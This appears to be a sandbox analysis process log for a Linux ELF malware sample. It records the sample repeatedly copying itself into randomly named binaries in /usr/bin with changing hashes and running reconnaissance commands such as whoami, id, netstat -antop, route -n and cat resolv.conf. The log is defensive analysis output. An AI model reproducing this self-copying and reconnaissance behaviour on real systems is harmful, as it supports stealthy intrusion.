                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/sosfbbrzmx
                                                                              Arguments:/usr/bin/sosfbbrzmx whoami 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:01fd1f9249b1844a8c8d2d32cedc38b7

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/sosfbbrzmx
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:01fd1f9249b1844a8c8d2d32cedc38b7

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/sosfbbrzmx
                                                                              Arguments:/usr/bin/sosfbbrzmx ls 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:01fd1f9249b1844a8c8d2d32cedc38b7

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/sosfbbrzmx
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:01fd1f9249b1844a8c8d2d32cedc38b7

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/sosfbbrzmx
                                                                              Arguments:/usr/bin/sosfbbrzmx top 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:01fd1f9249b1844a8c8d2d32cedc38b7

                                                                              Start time (UTC):14:28:04
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/sosfbbrzmx
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:01fd1f9249b1844a8c8d2d32cedc38b7

                                                                              Start time (UTC):14:28:09
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:09
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:09
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/gphlkawhxw
                                                                              Arguments:/usr/bin/gphlkawhxw "ifconfig eth0" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:32baef41bef86e657cecb26ba601c8fd

                                                                              Start time (UTC):14:28:09
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/gphlkawhxw
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:32baef41bef86e657cecb26ba601c8fd

                                                                              Start time (UTC):14:28:09
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:09
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:09
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/gphlkawhxw
                                                                              Arguments:/usr/bin/gphlkawhxw uptime 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:32baef41bef86e657cecb26ba601c8fd

                                                                              Start time (UTC):14:28:10
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/gphlkawhxw
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:32baef41bef86e657cecb26ba601c8fd

                                                                              Start time (UTC):14:28:09
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:09
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:09
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/gphlkawhxw
                                                                              Arguments:/usr/bin/gphlkawhxw "route -n" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:32baef41bef86e657cecb26ba601c8fd

                                                                              Start time (UTC):14:28:10
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/gphlkawhxw
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:32baef41bef86e657cecb26ba601c8fd

                                                                              Start time (UTC):14:28:09
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:09
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:09
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/gphlkawhxw
                                                                              Arguments:/usr/bin/gphlkawhxw ls 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:32baef41bef86e657cecb26ba601c8fd

                                                                              Start time (UTC):14:28:10
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/gphlkawhxw
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:32baef41bef86e657cecb26ba601c8fd

                                                                              Start time (UTC):14:28:10
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:10
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:10
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/gphlkawhxw
                                                                              Arguments:/usr/bin/gphlkawhxw who 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:32baef41bef86e657cecb26ba601c8fd

                                                                              Start time (UTC):14:28:10
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/gphlkawhxw
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:32baef41bef86e657cecb26ba601c8fd

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vnihfmehfy
                                                                              Arguments:/usr/bin/vnihfmehfy "cat resolv.conf" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0f21df0836e951d36bb440812753052

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vnihfmehfy
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0f21df0836e951d36bb440812753052

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vnihfmehfy
                                                                              Arguments:/usr/bin/vnihfmehfy id 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0f21df0836e951d36bb440812753052

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vnihfmehfy
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0f21df0836e951d36bb440812753052

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vnihfmehfy
                                                                              Arguments:/usr/bin/vnihfmehfy sh 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0f21df0836e951d36bb440812753052

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vnihfmehfy
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0f21df0836e951d36bb440812753052

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vnihfmehfy
                                                                              Arguments:/usr/bin/vnihfmehfy uptime 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0f21df0836e951d36bb440812753052

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vnihfmehfy
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0f21df0836e951d36bb440812753052

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vnihfmehfy
                                                                              Arguments:/usr/bin/vnihfmehfy top 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0f21df0836e951d36bb440812753052

                                                                              Start time (UTC):14:28:15
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vnihfmehfy
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0f21df0836e951d36bb440812753052

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/eqoogeqyds
                                                                              Arguments:/usr/bin/eqoogeqyds "netstat -an" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:4bb785727d658c24555afb2552203824

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/eqoogeqyds
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:4bb785727d658c24555afb2552203824

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/eqoogeqyds
                                                                              Arguments:/usr/bin/eqoogeqyds "echo \"find\"" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:4bb785727d658c24555afb2552203824

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/eqoogeqyds
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:4bb785727d658c24555afb2552203824

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/eqoogeqyds
                                                                              Arguments:/usr/bin/eqoogeqyds whoami 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:4bb785727d658c24555afb2552203824

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/eqoogeqyds
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:4bb785727d658c24555afb2552203824

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/eqoogeqyds
                                                                              Arguments:/usr/bin/eqoogeqyds "sleep 1" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:4bb785727d658c24555afb2552203824

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/eqoogeqyds
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:4bb785727d658c24555afb2552203824

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/eqoogeqyds
                                                                              Arguments:/usr/bin/eqoogeqyds "route -n" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:4bb785727d658c24555afb2552203824

                                                                              Start time (UTC):14:28:21
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/eqoogeqyds
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:4bb785727d658c24555afb2552203824

                                                                              Start time (UTC):14:28:26
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:26
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:26
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/otlzwyqefc
                                                                              Arguments:/usr/bin/otlzwyqefc whoami 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:3cab282fbf544a8c5da93e8a6e8649d0

                                                                              Start time (UTC):14:28:26
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/otlzwyqefc
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:3cab282fbf544a8c5da93e8a6e8649d0

                                                                              Start time (UTC):14:28:26
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:26
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:26
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/otlzwyqefc
                                                                              Arguments:/usr/bin/otlzwyqefc ls 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:3cab282fbf544a8c5da93e8a6e8649d0

                                                                              Start time (UTC):14:28:26
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/otlzwyqefc
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:3cab282fbf544a8c5da93e8a6e8649d0

                                                                              Start time (UTC):14:28:26
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:26
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:26
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/otlzwyqefc
                                                                              Arguments:/usr/bin/otlzwyqefc uptime 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:3cab282fbf544a8c5da93e8a6e8649d0

                                                                              Start time (UTC):14:28:27
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/otlzwyqefc
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:3cab282fbf544a8c5da93e8a6e8649d0

                                                                              Start time (UTC):14:28:26
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:26
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:26
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/otlzwyqefc
                                                                              Arguments:/usr/bin/otlzwyqefc "netstat -antop" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:3cab282fbf544a8c5da93e8a6e8649d0

                                                                              Start time (UTC):14:28:27
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/otlzwyqefc
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:3cab282fbf544a8c5da93e8a6e8649d0

                                                                              Start time (UTC):14:28:26
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:26
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:26
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/otlzwyqefc
                                                                              Arguments:/usr/bin/otlzwyqefc sh 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:3cab282fbf544a8c5da93e8a6e8649d0

                                                                              Start time (UTC):14:28:27
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/otlzwyqefc
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:3cab282fbf544a8c5da93e8a6e8649d0

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/dthtwwmqvu
                                                                              Arguments:/usr/bin/dthtwwmqvu ls 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0744c231fd483b8e536adaae22fed9c

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/dthtwwmqvu
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0744c231fd483b8e536adaae22fed9c

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/dthtwwmqvu
                                                                              Arguments:/usr/bin/dthtwwmqvu whoami 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0744c231fd483b8e536adaae22fed9c

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/dthtwwmqvu
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0744c231fd483b8e536adaae22fed9c

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/dthtwwmqvu
                                                                              Arguments:/usr/bin/dthtwwmqvu ifconfig 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0744c231fd483b8e536adaae22fed9c

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/dthtwwmqvu
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0744c231fd483b8e536adaae22fed9c

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/dthtwwmqvu
                                                                              Arguments:/usr/bin/dthtwwmqvu "netstat -an" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0744c231fd483b8e536adaae22fed9c

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/dthtwwmqvu
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0744c231fd483b8e536adaae22fed9c

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/dthtwwmqvu
                                                                              Arguments:/usr/bin/dthtwwmqvu "netstat -an" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0744c231fd483b8e536adaae22fed9c

                                                                              Start time (UTC):14:28:32
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/dthtwwmqvu
                                                                              Arguments:-
                                                                              File size:548649 bytes
                                                                              MD5 hash:f0744c231fd483b8e536adaae22fed9c

                                                                              Start time (UTC):14:28:37
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:37
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:28:37
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/jeyjdycnpv
                                                                              Arguments:/usr/bin/jeyjdycnpv "cat resolv.conf" 6261
                                                                              File size:548649 bytes
                                                                              MD5 hash:874925f3383cf4d89cfb331d6357dcc4

                                                                              Start time (UTC):14:28:37
